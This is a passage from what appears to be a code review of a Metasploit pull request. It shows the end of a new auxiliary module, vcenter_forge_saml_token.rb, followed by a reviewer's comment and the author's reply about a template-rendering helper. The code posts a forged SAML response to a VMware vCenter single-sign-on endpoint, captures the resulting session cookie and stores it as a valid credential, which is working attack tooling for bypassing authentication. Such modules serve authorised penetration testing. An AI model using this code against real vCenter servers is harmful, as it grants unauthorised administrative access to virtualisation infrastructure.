modules/auxiliary/admin/vmware/vcenter_forge_saml_token.rb

```diff
@@ -0,0 +1,414 @@
+        },
+        'keep_cookies' => 'true'
+      })
+    else
+      res = send_request_cgi({
+        'uri' => '/ui/saml/websso/sso',
+        'method' => 'POST',
+        'vars_post' => {
+          'SAMLResponse' => saml_response
+        },
+        'keep_cookies' => 'true'
+      })
+    end
+
+    unless res
+      fail_with(Msf::Exploit::Failure::Unreachable, "#{rhosts} - could not reach SAML endpoint")
+    end
+
+    unless res.code == 302
+      if res.body.to_s != ''
+        res_html = Nokogiri::HTML(res.body.to_s)
+        res_detail = res_html.at("//div[@class='error-message']").text.gsub('..', '.')
+        if res_detail
+          print_error("Response: #{res_detail}")
+        else
+          print_error("Unable to interpret response from vCenter. Raw response:\n#{res}")
+        end
+      end
+      fail_with(Msf::Exploit::Failure::UnexpectedReply, "Expected HTTP 302, got HTTP #{res.code}")
+    end
+
+    cookie_jar.cookies.each do |c|
+      print_status("Got cookie: #{c.name}=#{c.value}")
+    end
+
+    @vcenter_saml_token = res.get_cookies_parsed.values.select { |v| v.to_s.include?('JSESSIONID') }.first.first
+    @vcenter_saml_path = res.get_cookies_parsed.values.select { |v| v.to_s.include?('Path') }.first.first
+
+    extra_service_data = {
+      origin_type: :service,
+      realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+      realm_value: domain
+    }.merge(service_details)
+
+    store_valid_credential(user: "JSESSIONID (#{@vcenter_saml_path})", private: @vcenter_saml_token, service_data: extra_service_data)
+
+    "JSESSIONID=#{@vcenter_saml_token}; Path=#{@vcenter_saml_path}"
+  end
+
+  def validate_fqdn(fqdn)
+    fqdn_regex = /(?=^.{4,253}$)(^((?!-)[a-z0-9-]{0,62}[a-z0-9]\.)+[a-z]{2,63}$)/
+    return true if fqdn_regex.match?(fqdn.to_s.downcase)
+
+    false
+  end
+
+  def validate_timestamps
+    unless (vc_token_before_skew >= 300) && (vc_token_after_skew >= 300)
+      fail_with(Msf::Exploit::Failure::BadConfig, 'Advanced options NOT_BEFORE and NOT_AFTER time skew cannot be less than 300 seconds')
+    end
+    unless (vc_token_before_skew <= 2592000) && (vc_token_after_skew <= 2592000)
+      fail_with(Msf::Exploit::Failure::BadConfig, 'Advanced options NOT_BEFORE and NOT_AFTER time skew cannot be greater than 2592000 seconds')
+    end
+  end
+end
+
+# Copied pretty much wholesale from exchange_proxyshell_rce.rb
+class XMLTemplate
+  def self.render(template_name, context = nil)
+    file_path = ::File.join(::Msf::Config.data_directory, 'auxiliary', 'vmware', 'vcenter_forge_saml_token', "#{template_name}.xml.erb")
+    template = ::File.binread(file_path)
+    case context
+    when Hash
+      b = binding
+      locals = context.collect { |k, _| "#{k} = context[#{k.inspect}]; " }
+      b.eval(locals.join)
+    when NilClass
+      b = binding
+    else
+      raise ArgumentError
+    end
+    b.eval(Erubi::Engine.new(template).src)
+  end
+end
```

Comment:
While this works, the intended scope in `exchange_proxyshell_rce` was as a helper for generic usage with multiple templates, in this module a direct call to render the template would reduce the complexity.

I did point you at this example, sorry for the churn.

```suggestion
```

Reply:
I noticed that but implemented it anyway (extensibility is nice) - however, it's great to know the pattern for both approaches. The latest commit made this more streamlined, let me know if I missed the mark significantly.